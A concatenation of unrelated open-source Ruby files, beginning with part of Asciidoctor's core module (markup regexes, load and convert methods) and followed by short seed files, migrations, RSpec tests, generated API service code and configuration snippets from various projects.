KbdDelimiterRx = /(?:\+|,)(?=#{CG_BLANK}*[^\1])/
# Matches an implicit link and some of the link inline macro.
#
# Examples
#
# http://github.com
# http://github.com[GitHub]
#
# FIXME revisit! the main issue is we need different rules for implicit vs explicit
LinkInlineRx = %r{(^|link:|<|[\s>\(\)\[\];])(\\?(?:https?|file|ftp|irc)://[^\s\[\]<]*[^\s.,\[\]<])(?:\[((?:\\\]|[^\]])*?)\])?}
# Match a link or e-mail inline macro.
#
# Examples
#
# link:path[label]
# mailto:[email protected][]
#
LinkInlineMacroRx = /\\?(?:link|mailto):([^\s\[]+)(?:\[((?:\\\]|[^\]])*?)\])/
# Matches a stem (and alternatives, asciimath and latexmath) inline macro, which may span multiple lines.
#
# Examples
#
# stem:[x != 0]
# asciimath:[x != 0]
# latexmath:[\sqrt{4} = 2]
#
StemInlineMacroRx = /\\?(stem|(?:latex|ascii)math):([a-z,]*)\[(#{CC_ALL}*?[^\\])\]/m
# Matches a menu inline macro.
#
# Examples
#
# menu:File[New...]
# menu:View[Page Style > No Style]
# menu:View[Page Style, No Style]
#
MenuInlineMacroRx = /\\?menu:(#{CG_WORD}|#{CG_WORD}.*?\S)\[#{CG_BLANK}*(.+?)?\]/
# Matches an implicit menu inline macro.
#
# Examples
#
# "File > New..."
#
MenuInlineRx = /\\?"(#{CG_WORD}[^"]*?#{CG_BLANK}*>#{CG_BLANK}*[^" \t][^"]*)"/
# Matches an inline passthrough value, which may span multiple lines.
#
# Examples
#
# +text+
# `text` (compat)
#
# NOTE we always capture the attributes so we know when to use compatible (i.e., legacy) behavior
PassInlineRx = {
false => ['+', '`', /(^|[^#{CC_WORD};:])(?:\[([^\]]+?)\])?(\\?(\+|`)(\S|\S#{CC_ALL}*?\S)\4)(?!#{CG_WORD})/m],
true => ['`', nil, /(^|[^`#{CC_WORD}])(?:\[([^\]]+?)\])?(\\?(`)([^`\s]|[^`\s]#{CC_ALL}*?\S)\4)(?![`#{CC_WORD}])/m]
}
# Matches several variants of the passthrough inline macro, which may span multiple lines.
#
# Examples
#
# +++text+++
# $$text$$
# pass:quotes[text]
#
PassInlineMacroRx = /(?:(?:(\\?)\[([^\]]+?)\])?(\\{0,2})(\+{2,3}|\${2})(#{CC_ALL}*?)\4|(\\?)pass:([a-z,]*)\[(#{CC_ALL}*?[^\\])\])/m
# Matches an xref (i.e., cross-reference) inline macro, which may span multiple lines.
#
# Examples
#
# <<id,reftext>>
# xref:id[reftext]
#
# NOTE special characters have already been escaped, hence the entity references
XrefInlineMacroRx = /\\?(?:<<([#{CC_WORD}":.\/]#{CC_ALL}*?)>>|xref:([#{CC_WORD}":.\/]#{CC_ALL}*?)\[(#{CC_ALL}*?)\])/m
## Layout
# Matches a trailing + preceded by at least one space character,
# which forces a hard line break (<br> tag in HTML outputs).
#
# Examples
#
# +
# Foo +
#
if RUBY_ENGINE == 'opal'
# NOTE JavaScript only treats ^ and $ as line boundaries in multiline regexp; . won't match newlines
LineBreakRx = /^(.*)[ \t]\+$/m
else
LineBreakRx = /^(.*)[[:blank:]]\+$/
end
# Matches an AsciiDoc horizontal rule or AsciiDoc page break.
#
# Examples
#
# ''' (horizontal rule)
# <<< (page break)
#
LayoutBreakLineRx = /^('|<){3,}$/
# Matches an AsciiDoc or Markdown horizontal rule or AsciiDoc page break.
#
# Examples
#
# ''' or ' ' ' (horizontal rule)
# --- or - - - (horizontal rule)
# *** or * * * (horizontal rule)
# <<< (page break)
#
LayoutBreakLinePlusRx = /^(?:'|<){3,}$|^ {0,3}([-\*_])( *)\1\2\1$/
## General
# Matches a blank line.
#
# NOTE allows for empty space in line as it could be left by the template engine
BlankLineRx = /^#{CG_BLANK}*\n/
# Matches a comma or semi-colon delimiter.
#
# Examples
#
# one,two
# three;four
#
DataDelimiterRx = /,|;/
# Matches a single-line of text enclosed in double quotes, capturing the quote char and text.
#
# Examples
#
# "Who goes there?"
#
DoubleQuotedRx = /^("|)(.*)\1$/
# Matches multiple lines of text enclosed in double quotes, capturing the quote char and text.
#
# Examples
#
# "I am a run-on sentence and I like
# to take up multiple lines and I
# still want to be matched."
#
DoubleQuotedMultiRx = /^("|)(#{CC_ALL}*)\1$/m
# Matches one or more consecutive digits at the end of a line.
#
# Examples
#
# docbook45
# html5
#
TrailingDigitsRx = /\d+$/
# Matches a space escaped by a backslash.
#
# Examples
#
# one\ two\ three
#
EscapedSpaceRx = /\\(#{CG_BLANK})/
# Matches a space delimiter that's not escaped.
#
# Examples
#
# one two three four
#
SpaceDelimiterRx = /([^\\])#{CG_BLANK}+/
# Matches a + or - modifier in a subs list
#
SubModifierSniffRx = /[+-]/
# Matches any character with multibyte support explicitly enabled (length of multibyte char = 1)
#
# NOTE If necessary to hide use of the language modifier (u) from JavaScript, use (Regexp.new '.', false, 'u')
#
UnicodeCharScanRx = unless RUBY_ENGINE == 'opal'
FORCE_UNICODE_LINE_LENGTH ? /./u : nil
end
# Detects strings that resemble URIs.
#
# Examples
# http://domain
# https://domain
# file:///path
# data:info
#
# not c:/sample.adoc or c:\sample.adoc
#
UriSniffRx = %r{^#{CG_ALPHA}[#{CC_ALNUM}.+-]+:/{0,2}}
# Detects the end of an implicit URI in the text
#
# Examples
#
# (http://google.com)
# >http://google.com<
# (See http://google.com):
#
UriTerminator = /[);:]$/
# Detects XML tags
XmlSanitizeRx = /<[^>]+>/
# Unused
# Detects any fenced block delimiter, including:
# listing, literal, example, sidebar, quote, passthrough, table and fenced code
# Does not match open blocks or air quotes
# TIP position the most common blocks towards the front of the pattern
#BlockDelimiterRx = %r{^(?:(?:-|\.|=|\*|_|\+|/){4,}|[\|,;!]={3,}|(?:`|~){3,}.*)$}
# Matches an escaped single quote within a word
#
# Examples
#
# Here\'s Johnny!
#
#EscapedSingleQuoteRx = /(#{CG_WORD})\\'(#{CG_WORD})/
# an alternative if our backend generates single-quoted html/xml attributes
#EscapedSingleQuoteRx = /(#{CG_WORD}|=)\\'(#{CG_WORD})/
# Matches whitespace at the beginning of the line
#LeadingSpacesRx = /^(#{CG_BLANK}*)/
# Matches parent directory references at the beginning of a path
#LeadingParentDirsRx = /^(?:\.\.\/)*/
#StripLineWise = /\A(?:\s*\n)?(#{CC_ALL}*?)\s*\z/m
#end
INTRINSIC_ATTRIBUTES = {
'startsb' => '[',
'endsb' => ']',
'vbar' => '|',
'caret' => '^',
'asterisk' => '*',
'tilde' => '~',
'plus' => '+',
'backslash' => '\\',
'backtick' => '`',
'blank' => '',
'empty' => '',
'sp' => ' ',
'two-colons' => '::',
'two-semicolons' => ';;',
'nbsp' => ' ',
'deg' => '°',
'zwsp' => '​',
'quot' => '"',
'apos' => ''',
'lsquo' => '‘',
'rsquo' => '’',
'ldquo' => '“',
'rdquo' => '”',
'wj' => '⁠',
'brvbar' => '¦',
'cpp' => 'C++',
'amp' => '&',
'lt' => '<',
'gt' => '>'
}
# unconstrained quotes:: can appear anywhere
# constrained quotes:: must be bordered by non-word characters
# NOTE these substitutions are processed in the order they appear here and
# the order in which they are replaced is important
quote_subs = [
# **strong**
[:strong, :unconstrained, /\\?(?:\[([^\]]+?)\])?\*\*(#{CC_ALL}+?)\*\*/m],
# *strong*
[:strong, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+?)\])?\*(\S|\S#{CC_ALL}*?\S)\*(?!#{CG_WORD})/m],
# "`double-quoted`"
[:double, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+?)\])?"`(\S|\S#{CC_ALL}*?\S)`"(?!#{CG_WORD})/m],
# '`single-quoted`'
[:single, :constrained, /(^|[^#{CC_WORD};:`}])(?:\[([^\]]+?)\])?'`(\S|\S#{CC_ALL}*?\S)`'(?!#{CG_WORD})/m],
# ``monospaced``
[:monospaced, :unconstrained, /\\?(?:\[([^\]]+?)\])?``(#{CC_ALL}+?)``/m],
# `monospaced`
[:monospaced, :constrained, /(^|[^#{CC_WORD};:"'`}])(?:\[([^\]]+?)\])?`(\S|\S#{CC_ALL}*?\S)`(?![#{CC_WORD}"'`])/m],
# __emphasis__
[:emphasis, :unconstrained, /\\?(?:\[([^\]]+?)\])?__(#{CC_ALL}+?)__/m],
# _emphasis_
[:emphasis, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+?)\])?_(\S|\S#{CC_ALL}*?\S)_(?!#{CG_WORD})/m],
# ##mark## (referred to in AsciiDoc Python as unquoted)
[:mark, :unconstrained, /\\?(?:\[([^\]]+?)\])?##(#{CC_ALL}+?)##/m],
# #mark# (referred to in AsciiDoc Python as unquoted)
[:mark, :constrained, /(^|[^#{CC_WORD}&;:}])(?:\[([^\]]+?)\])?#(\S|\S#{CC_ALL}*?\S)#(?!#{CG_WORD})/m],
# ^superscript^
[:superscript, :unconstrained, /\\?(?:\[([^\]]+?)\])?\^(\S+?)\^/],
# ~subscript~
[:subscript, :unconstrained, /\\?(?:\[([^\]]+?)\])?~(\S+?)~/]
]
compat_quote_subs = quote_subs.dup
# ``quoted''
compat_quote_subs[2] = [:double, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+?)\])?``(\S|\S#{CC_ALL}*?\S)''(?!#{CG_WORD})/m]
# `quoted'
compat_quote_subs[3] = [:single, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+?)\])?`(\S|\S#{CC_ALL}*?\S)'(?!#{CG_WORD})/m]
# ++monospaced++
compat_quote_subs[4] = [:monospaced, :unconstrained, /\\?(?:\[([^\]]+?)\])?\+\+(#{CC_ALL}+?)\+\+/m]
# +monospaced+
compat_quote_subs[5] = [:monospaced, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+?)\])?\+(\S|\S#{CC_ALL}*?\S)\+(?!#{CG_WORD})/m]
# #unquoted#
#compat_quote_subs[8] = [:unquoted, *compat_quote_subs[8][1..-1]]
# ##unquoted##
#compat_quote_subs[9] = [:unquoted, *compat_quote_subs[9][1..-1]]
# 'emphasis'
compat_quote_subs.insert 3, [:emphasis, :constrained, /(^|[^#{CC_WORD};:}])(?:\[([^\]]+?)\])?'(\S|\S#{CC_ALL}*?\S)'(?!#{CG_WORD})/m]
QUOTE_SUBS = {
false => quote_subs,
true => compat_quote_subs
}
quote_subs = nil
compat_quote_subs = nil
# NOTE in Ruby 1.8.7, [^\\] does not match start of line,
# so we need to match it explicitly
# order is significant
REPLACEMENTS = [
# (C)
[/\\?\(C\)/, '©', :none],
# (R)
[/\\?\(R\)/, '®', :none],
# (TM)
[/\\?\(TM\)/, '™', :none],
# foo -- bar
# FIXME this drops the endline if it appears at end of line
[/(^|\n| |\\)--( |\n|$)/, ' — ', :none],
# foo--bar
[/(#{CG_WORD})\\?--(?=#{CG_WORD})/, '—​', :leading],
# ellipsis
[/\\?\.\.\./, '…​', :leading],
# right single quote
[/\\?`'/, '’', :none],
# apostrophe (inside a word)
[/(#{CG_ALNUM})\\?'(?=#{CG_ALPHA})/, '’', :leading],
# right arrow ->
[/\\?->/, '→', :none],
# right double arrow =>
[/\\?=>/, '⇒', :none],
# left arrow <-
[/\\?<-/, '←', :none],
# left double arrow <=
[/\\?<=/, '⇐', :none],
# restore entities
[/\\?(&)amp;((?:[a-zA-Z]+|#\d{2,5}|#x[a-fA-F0-9]{2,4});)/, '', :bounding]
]
class << self
# Public: Parse the AsciiDoc source input into a {Document}
#
# Accepts input as an IO (or StringIO), String or String Array object. If the
# input is a File, information about the file is stored in attributes on the
# Document object.
#
# input - the AsciiDoc source as a IO, String or Array.
# options - a String, Array or Hash of options to control processing (default: {})
# String and Array values are converted into a Hash.
# See {Document#initialize} for details about these options.
#
# Returns the Document
def load input, options = {}
options = options.dup
if (timings = options[:timings])
timings.start :read
end
attributes = options[:attributes] = if !(attrs = options[:attributes])
{}
elsif ::Hash === attrs || (::RUBY_ENGINE_JRUBY && ::Java::JavaUtil::Map === attrs)
attrs.dup
elsif ::Array === attrs
attrs.inject({}) do |accum, entry|
k, v = entry.split '=', 2
accum[k] = v || ''
accum
end
elsif ::String === attrs
# convert non-escaped spaces into null character, so we split on the
# correct spaces chars, and restore escaped spaces
capture_1 = '\1'
attrs = attrs.gsub(SpaceDelimiterRx, %(#{capture_1}#{NULL})).gsub(EscapedSpaceRx, capture_1)
attrs.split(NULL).inject({}) do |accum, entry|
k, v = entry.split '=', 2
accum[k] = v || ''
accum
end
elsif (attrs.respond_to? :keys) && (attrs.respond_to? :[])
# convert it to a Hash as we know it
original_attrs = attrs
attrs = {}
original_attrs.keys.each do |key|
attrs[key] = original_attrs[key]
end
attrs
else
raise ::ArgumentError, %(illegal type for attributes option: #{attrs.class.ancestors})
end
lines = nil
if ::File === input
# TODO cli checks if input path can be read and is file, but might want to add check to API
input_path = ::File.expand_path input.path
input_mtime = input.mtime
lines = input.readlines
# hold off on setting infile and indir until we get a better sense of their purpose
attributes['docfile'] = input_path
attributes['docdir'] = ::File.dirname input_path
attributes['docname'] = Helpers.basename input_path, true
docdate = (attributes['docdate'] ||= input_mtime.strftime('%Y-%m-%d'))
doctime = (attributes['doctime'] ||= input_mtime.strftime('%H:%M:%S %Z'))
attributes['docdatetime'] = %(#{docdate} #{doctime})
elsif input.respond_to? :readlines
# NOTE tty, pipes & sockets can't be rewound, but can't be sniffed easily either
# just fail the rewind operation silently to handle all cases
begin
input.rewind
rescue
end
lines = input.readlines
elsif ::String === input
lines = input.lines.entries
elsif ::Array === input
lines = input.dup
else
raise ::ArgumentError, %(unsupported input type: #{input.class})
end
if timings
timings.record :read
timings.start :parse
end
if options[:parse] == false
doc = Document.new lines, options
else
doc = (Document.new lines, options).parse
end
timings.record :parse if timings
doc
rescue => ex
begin
context = %(asciidoctor: FAILED: #{attributes['docfile'] || '<stdin>'}: Failed to load AsciiDoc document)
if ex.respond_to? :exception
# The original message must be explicitely preserved when wrapping a Ruby exception
wrapped_ex = ex.exception %(#{context} - #{ex.message})
# JRuby automatically sets backtrace, but not MRI
wrapped_ex.set_backtrace ex.backtrace
else
# Likely a Java exception class
wrapped_ex = ex.class.new context, ex
wrapped_ex.stack_trace = ex.stack_trace
end
rescue
wrapped_ex = ex
end
raise wrapped_ex
end
# Public: Parse the contents of the AsciiDoc source file into an Asciidoctor::Document
#
# Accepts input as an IO, String or String Array object. If the
# input is a File, information about the file is stored in
# attributes on the Document.
#
# input - the String AsciiDoc source filename
# options - a String, Array or Hash of options to control processing (default: {})
# String and Array values are converted into a Hash.
# See Asciidoctor::Document#initialize for details about options.
#
# Returns the Asciidoctor::Document
def load_file filename, options = {}
self.load ::File.new(filename || ''), options
end
# Public: Parse the AsciiDoc source input into an Asciidoctor::Document and
# convert it to the specified backend format.
#
# Accepts input as an IO, String or String Array object. If the
# input is a File, information about the file is stored in
# attributes on the Document.
#
# If the :in_place option is true, and the input is a File, the output is
# written to a file adjacent to the input file, having an extension that
# corresponds to the backend format. Otherwise, if the :to_file option is
# specified, the file is written to that file. If :to_file is not an absolute
# path, it is resolved relative to :to_dir, if given, otherwise the
# Document#base_dir. If the target directory does not exist, it will not be
# created unless the :mkdirs option is set to true. If the file cannot be
# written because the target directory does not exist, or because it falls
# outside of the Document#base_dir in safe mode, an IOError is raised.
#
# If the output is going to be written to a file, the header and footer are
# included unless specified otherwise (writing to a file implies creating a
# standalone document). Otherwise, the header and footer are not included by
# default and the converted result is returned.
#
# input - the String AsciiDoc source filename
# options - a String, Array or Hash of options to control processing (default: {})
# String and Array values are converted into a Hash.
# See Asciidoctor::Document#initialize for details about options.
#
# Returns the Document object if the converted String is written to a
# file, otherwise the converted String
def convert input, options = {}
options = options.dup
options.delete(:parse)
to_file = options.delete(:to_file)
to_dir = options.delete(:to_dir)
mkdirs = options.delete(:mkdirs) || false
timings = options[:timings]
case to_file
when true, nil
write_to_same_dir = !to_dir && ::File === input
stream_output = false
write_to_target = to_dir
to_file = nil
when false
write_to_same_dir = false
stream_output = false
write_to_target = false
to_file = nil
when '/dev/null'
return self.load input, options
else
write_to_same_dir = false
stream_output = to_file.respond_to? :write
write_to_target = stream_output ? false : to_file
end
unless options.key? :header_footer
options[:header_footer] = true if write_to_same_dir || write_to_target
end
# NOTE at least make intended target directory available, if there is one
if write_to_same_dir
input_path = ::File.expand_path input.path
options[:to_dir] = (outdir = ::File.dirname input_path)
elsif write_to_target
if to_dir
if to_file
options[:to_dir] = ::File.dirname ::File.expand_path(::File.join to_dir, to_file)
else
options[:to_dir] = ::File.expand_path to_dir
end
elsif to_file
options[:to_dir] = ::File.dirname ::File.expand_path to_file
end
else
options[:to_dir] = nil
end
doc = self.load input, options
if write_to_same_dir
outfile = ::File.join outdir, %(#{doc.attributes['docname']}#{doc.outfilesuffix})
if outfile == input_path
raise ::IOError, %(input file and output file cannot be the same: #{outfile})
end
elsif write_to_target
working_dir = options.has_key?(:base_dir) ? ::File.expand_path(options[:base_dir]) : ::File.expand_path(::Dir.pwd)
# QUESTION should the jail be the working_dir or doc.base_dir???
jail = doc.safe >= SafeMode::SAFE ? working_dir : nil
if to_dir
outdir = doc.normalize_system_path(to_dir, working_dir, jail, :target_name => 'to_dir', :recover => false)
if to_file
outfile = doc.normalize_system_path(to_file, outdir, nil, :target_name => 'to_dir', :recover => false)
# reestablish outdir as the final target directory (in the case to_file had directory segments)
outdir = ::File.dirname outfile
else
outfile = ::File.join outdir, %(#{doc.attributes['docname']}#{doc.outfilesuffix})
end
elsif to_file
outfile = doc.normalize_system_path(to_file, working_dir, jail, :target_name => 'to_dir', :recover => false)
# establish outdir as the final target directory (in the case to_file had directory segments)
outdir = ::File.dirname outfile
end
unless ::File.directory? outdir
if mkdirs
::FileUtils.mkdir_p outdir
else
# NOTE we intentionally refer to the directory as it was passed to the API
raise ::IOError, %(target directory does not exist: #{to_dir})
end
end
else
outfile = to_file
outdir = nil
end
timings.start :convert if timings
opts = outfile && !stream_output ? { 'outfile' => outfile, 'outdir' => outdir } : {}
output = doc.convert opts
timings.record :convert if timings
if outfile
timings.start :write if timings
doc.write output, outfile
timings.record :write if timings
# NOTE document cannot control this behavior if safe >= SafeMode::SERVER
# NOTE skip if stylesdir is a URI
if !stream_output && doc.safe < SafeMode::SECURE && (doc.attr? 'linkcss') &&
(doc.attr? 'copycss') && (doc.attr? 'basebackend-html') &&
!((stylesdir = (doc.attr 'stylesdir')) && (Helpers.uriish? stylesdir))
copy_asciidoctor_stylesheet = false
copy_user_stylesheet = false
if (stylesheet = (doc.attr 'stylesheet'))
if DEFAULT_STYLESHEET_KEYS.include? stylesheet
copy_asciidoctor_stylesheet = true
elsif !(Helpers.uriish? stylesheet)
copy_user_stylesheet = true
end
end
copy_coderay_stylesheet = (doc.attr? 'source-highlighter', 'coderay') && (doc.attr 'coderay-css', 'class') == 'class'
copy_pygments_stylesheet = (doc.attr? 'source-highlighter', 'pygments') && (doc.attr 'pygments-css', 'class') == 'class'
if copy_asciidoctor_stylesheet || copy_user_stylesheet || copy_coderay_stylesheet || copy_pygments_stylesheet
stylesoutdir = doc.normalize_system_path(stylesdir, outdir, doc.safe >= SafeMode::SAFE ? outdir : nil)
Helpers.mkdir_p stylesoutdir if mkdirs
if copy_asciidoctor_stylesheet
Stylesheets.instance.write_primary_stylesheet stylesoutdir
# FIXME should Stylesheets also handle the user stylesheet?
elsif copy_user_stylesheet
if (stylesheet_src = (doc.attr 'copycss')).empty?
stylesheet_src = doc.normalize_system_path stylesheet
else
# NOTE in this case, copycss is a source location (but cannot be a URI)
stylesheet_src = doc.normalize_system_path stylesheet_src
end
stylesheet_dst = doc.normalize_system_path stylesheet, stylesoutdir, (doc.safe >= SafeMode::SAFE ? outdir : nil)
unless stylesheet_src == stylesheet_dst || (stylesheet_content = doc.read_asset stylesheet_src).nil?
::File.open(stylesheet_dst, 'w') {|f|
f.write stylesheet_content
}
end
end
if copy_coderay_stylesheet
Stylesheets.instance.write_coderay_stylesheet stylesoutdir
elsif copy_pygments_stylesheet
Stylesheets.instance.write_pygments_stylesheet stylesoutdir, (doc.attr 'pygments-style')
end
end
end
doc
else
output
end
end
# Alias render to convert to maintain backwards compatibility
alias :render :convert
# Public: Parse the contents of the AsciiDoc source file into an
# Asciidoctor::Document and convert it to the specified backend format.
#
# input - the String AsciiDoc source filename
# options - a String, Array or Hash of options to control processing (default: {})
# String and Array values are converted into a Hash.
# See Asciidoctor::Document#initialize for details about options.
#
# Returns the Document object if the converted String is written to a
# file, otherwise the converted String
def convert_file filename, options = {}
self.convert ::File.new(filename || ''), options
end
# Alias render_file to convert_file to maintain backwards compatibility
alias :render_file :convert_file
end
if RUBY_ENGINE == 'opal'
require 'asciidoctor/version'
require 'asciidoctor/timings'
else
autoload :VERSION, 'asciidoctor/version'
autoload :Timings, 'asciidoctor/timings'
end
end
# core extensions
require 'asciidoctor/core_ext'
# modules
require 'asciidoctor/helpers'
require 'asciidoctor/substitutors'
# abstract classes
require 'asciidoctor/abstract_node'
require 'asciidoctor/abstract_block'
# concrete classes
require 'asciidoctor/attribute_list'
require 'asciidoctor/block'
require 'asciidoctor/callouts'
require 'asciidoctor/converter'
require 'asciidoctor/converter/html5' if RUBY_ENGINE_OPAL
require 'asciidoctor/document'
require 'asciidoctor/inline'
require 'asciidoctor/list'
require 'asciidoctor/parser'
require 'asciidoctor/path_resolver'
require 'asciidoctor/reader'
require 'asciidoctor/section'
require 'asciidoctor/stylesheets'
require 'asciidoctor/table'
| 33.056825 | 202 | 0.5871 |
b92f33022d807a0789381755d64ae81505089be3 | 336 | daniel = User.create! name: "daniel", password: "secret"
daniel.tasks.create! name: "paint the fence"
daniel.tasks.create! name: "wax the car"
daniel.tasks.create! name: "sand the deck"
ryanb = User.create! name: "ryanb", password: "secret"
ryanb.tasks.create! name: "record some RailsCasts"
ryanb.tasks.create! name: "work on CanCan"
| 37.333333 | 56 | 0.732143 |
bf1f7f0b2a728170d1e49ad6cc0868598ba5c355 | 575 | require File.dirname(__FILE__) + '/../../spec_helper'
describe "Bignum#>=" do
before(:each) do
@bignum = bignum_value(14)
end
it "returns true if self is greater than or equal to other" do
(@bignum >= @bignum).should == true
(@bignum >= (@bignum + 2)).should == false
(@bignum >= 5664.2).should == true
(@bignum >= 4).should == true
end
it "raises an ArgumentError when given a non-Integer" do
lambda { @bignum >= "4" }.should raise_error(ArgumentError)
lambda { @bignum >= mock('str') }.should raise_error(ArgumentError)
end
end
| 28.75 | 71 | 0.636522 |
abdb8615b413f2af24a0a8be90417dfbf3b708eb | 195 | # frozen_string_literal: true
module RubyEventStore
::RSpec.describe Flipper do
it "has a version number" do
expect(RubyEventStore::Flipper::VERSION).not_to be nil
end
end
end
| 19.5 | 60 | 0.728205 |
012b32bffa2abc816622e19fdfd70b009e79e445 | 139 | class AddStatusToSolutions < ActiveRecord::Migration[5.0]
def change
add_column :solutions, :status, :integer, default: 0
end
end | 27.8 | 58 | 0.741007 |
79cfdca8fd462c85cafa3bf46dd73dd8b37f4b0a | 1,372 | # Encoding: utf-8
#
# This is auto-generated code, changes will be overwritten.
#
# Copyright:: Copyright 2013, Google Inc. All Rights Reserved.
# License:: Licensed under the Apache License, Version 2.0.
#
# Code generated by AdsCommon library 0.9.6 on 2014-08-12 14:22:33.
require 'ads_common/savon_service'
require 'dfp_api/v201405/content_bundle_service_registry'
module DfpApi; module V201405; module ContentBundleService
class ContentBundleService < AdsCommon::SavonService
def initialize(config, endpoint)
namespace = 'https://www.google.com/apis/ads/publisher/v201405'
super(config, endpoint, namespace, :v201405)
end
def create_content_bundles(*args, &block)
return execute_action('create_content_bundles', args, &block)
end
def get_content_bundles_by_statement(*args, &block)
return execute_action('get_content_bundles_by_statement', args, &block)
end
def perform_content_bundle_action(*args, &block)
return execute_action('perform_content_bundle_action', args, &block)
end
def update_content_bundles(*args, &block)
return execute_action('update_content_bundles', args, &block)
end
private
def get_service_registry()
return ContentBundleServiceRegistry
end
def get_module()
return DfpApi::V201405::ContentBundleService
end
end
end; end; end
| 29.191489 | 77 | 0.739796 |
3392f55db09df7847e311a2b88094d62df07748a | 2,193 | require 'test_helper'
class UserTest < ActiveSupport::TestCase
# test "the truth" do
# assert true
# end
def setup
@user = User.new(name: "Example User", email: '[email protected]', password: 'foovar', password_confirmation: 'foovar')
end
test "should be valid" do
assert @user.valid?
end
test "name should be present" do
@user.name = " "
assert_not @user.valid?
end
test "name should not be too long" do
@user.name = "a" * 51
assert_not @user.valid?
end
test "email should not be too long" do
@user.email = "a" * 244 + "@example.com"
assert_not @user.valid?
end
test "email validation should accept valid addresses" do
valid_addresses = %w[[email protected] [email protected] [email protected]
[email protected] [email protected]]
valid_addresses.each do |valid_address|
@user.email = valid_address
assert @user.valid?, "#{valid_address.inspect} should be valid"
end
end
test "email validation should reject invalid addresses" do
invalid_addresses = %w[user@example,com user_at_foo.org user.name@example.
foo@bar_baz.com foo@bar+baz.com [email protected]]
invalid_addresses.each do |invalid_address|
@user.email = invalid_address
assert_not @user.valid?, "#{invalid_address.inspect} should be invalid"
end
end
test "email addresses should be unique" do
duplicate_user = @user.dup
duplicate_user.email = @user.email.upcase
@user.save
assert_not duplicate_user.valid?
end
test "email addresses should be saved as lower-case" do
mixed_case_email = "[email protected]"
@user.email = mixed_case_email
@user.save
assert_equal mixed_case_email.downcase, @user.reload.email
end
test "password should be present (nonblank)" do
@user.password = @user.password_confirmation = " " * 6
assert_not @user.valid?
end
test "password should have a minimum length" do
@user.password = @user.password_confirmation = "a" * 5
assert_not @user.valid?
end
test "authenticated? should return false for a user with nil digest" do
assert_not @user.authenticated?('')
end
end
| 28.855263 | 122 | 0.677611 |
f726f0896dc3171bf70baa41e748d47f70c10f98 | 2,286 | # -------------------------------------------------------------------------- #
# Copyright 2002-2020, OpenNebula Project, OpenNebula Systems #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); you may #
# not use this file except in compliance with the License. You may obtain #
# a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#--------------------------------------------------------------------------- #
$: << File.dirname(__FILE__)
$: << File.join(File.dirname(__FILE__), '..')
require 'rexml/document'
require 'base64'
require 'yaml'
require 'command'
require 'vm'
require 'nic'
require 'address'
require 'security_groups'
require 'security_groups_iptables'
require 'vnm_driver'
require 'sg_driver'
require 'vlan'
require 'no_vlan'
require 'scripts_common'
Dir[File.expand_path('vnmmad-load.d', File.dirname(__FILE__)) + "/*.rb"].each{ |f| require f }
include OpenNebula
begin
NAME = File.join(File.dirname(__FILE__), "../etc/vnm/OpenNebulaNetwork.conf")
CONF = YAML.load_file(NAME)
rescue
# Default configuration values
CONF = {
:arp_cache_poisoning => true,
:vxlan_mc => "239.0.0.0",
:vxlan_ttl => "16",
:vxlan_mtu => "1500",
:validate_vlan_id => false,
:vlan_mtu => "1500",
:ipset_maxelem => "65536",
:keep_empty_bridge => false,
:datastore_location => '/var/lib/one/datastores'
}
end
# Set PATH
ENV['PATH'] = "#{ENV['PATH']}:/bin:/sbin:/usr/bin"
| 38.1 | 94 | 0.500437 |
871ad1e80d78f5df85ef36cb2ca2a77b510caf3b | 75 | Rails.application.routes.draw do
mount CasPer::Engine => "/cas_per"
end
| 15 | 36 | 0.733333 |
6a7811e9e8858d1d4c118ad26bbbddbbbaa8e36c | 489 | class CreateSpreePartLots < ActiveRecord::Migration
def change
create_table :spree_part_lots do |t|
t.integer :assembly_lot_id, null: false, index: true
t.integer :part_lot_id, null: false, index: true
t.integer :parent_id, null: true, index: true
t.integer :lft, null: false, index: true
t.integer :rgt, null: false, index: true
t.integer :depth, null: false, default: 0
t.integer :children_count, null: false, default: 0
end
end
end
| 34.928571 | 58 | 0.678937 |
4a537383be7866cdac33a33bf332d21f2ff8a323 | 1,995 | module Fastlane::Actions
describe 'QuitCoreSimulatorServiceAction' do
describe '#run' do
it 'does nothing if CoreSimulatorService is not running' do
allow(Fastlane::Actions).to receive(:sh).and_return('')
config = FastlaneCore::Configuration.create(
QuitCoreSimulatorServiceAction.available_options,
{ }
)
result = QuitCoreSimulatorServiceAction.run(config)
expect(result).to be_empty
end
it 'quits within 10 attempts' do
mocked_launchctl_list_results = [ 'running', '' ]
allow(Fastlane::Actions).to receive(:sh)
.with(/launchctl list/, anything) do
mocked_launchctl_list_results.shift
end
allow(Fastlane::Actions).to receive(:sh)
.with(/launchctl remove/, anything)
.and_return('launchctl remove')
config = FastlaneCore::Configuration.create(
QuitCoreSimulatorServiceAction.available_options,
{ }
)
allow(QuitCoreSimulatorServiceAction).to receive(:sleep)
result = QuitCoreSimulatorServiceAction.run(config)
expect(result).to eq(['launchctl remove'])
end
it 'crashes after 11 attempts' do
allow(Fastlane::Actions).to receive(:sh)
.with(/launchctl list/, anything)
.and_return('running')
allow(Fastlane::Actions).to receive(:sh)
.with(/launchctl remove/, anything)
.and_return('launchctl remove')
config = FastlaneCore::Configuration.create(
QuitCoreSimulatorServiceAction.available_options,
{ }
)
allow(QuitCoreSimulatorServiceAction).to receive(:sleep)
expect { QuitCoreSimulatorServiceAction.run(config) }.to(
raise_error(FastlaneCore::Interface::FastlaneCrash) do |error|
expect(error.message).to match(/Unable to quit com\.apple\.CoreSimulator\.CoreSimulatorService/)
end
)
end
end
end
end
| 33.813559 | 108 | 0.639599 |
7abce1616f5c99c9c9529fb823518639074667fa | 867 | # Require any additional compass plugins here.
# Set this to the root of your project when deployed:
http_path = "."
# css_dir = "stylesheets"
# sass_dir = "sass"
# images_dir = "images"
# javascripts_dir = "javascripts"
# You can select your preferred output style here (can be overridden via the command line):
# output_style = :expanded or :nested or :compact or :compressed
# To enable relative paths to assets via compass helper functions. Uncomment:
